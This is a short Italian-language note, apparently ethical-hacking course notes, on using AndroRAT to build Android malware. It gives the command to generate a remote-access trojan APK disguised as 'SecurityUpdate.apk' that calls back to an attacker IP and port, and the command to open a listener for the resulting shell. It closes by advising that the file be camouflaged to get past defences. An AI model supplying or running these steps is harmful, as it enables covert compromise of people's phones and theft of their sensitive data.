tags: AndroRAT Android_Hacking Android_Malware Mobile_Hacking
AndroRAT è un software che crea un malware che una volta installato ed eseguito nella macchina vittima permette di ottenere informazioni sensibili su quel dispositivo, l’utilizzo è molto semplice e il software si può trovare o su github e nella cartella CEH nella sezione mobile hacking.
Il comando più basilare è il seguente che crea il malware con indirizzo IP dell’attaccante, la porta sulla quale vogliamo ascoltare e il nome del file che gli vogliamo dare:
python3 androRAT.py --build -i 10.10.1.13 -p 4444 -o SecurityUpdate.apk
Ora ci possiamo mettere in ascolto con il comando:
python3 androRAT.py --shell -i 0.0.0.0 -p 4444
Non appena il file verrà eseguito sulla macchina vittima potremo ottenere tutte queste informazioni dopo che la connessione ha avuto successo:
Il problema di questo è che il file apk viene riconosciuto molto facilmente dai sistemi di difesa, quindi è bene cercare di camuffarlo prima di trasferirlo.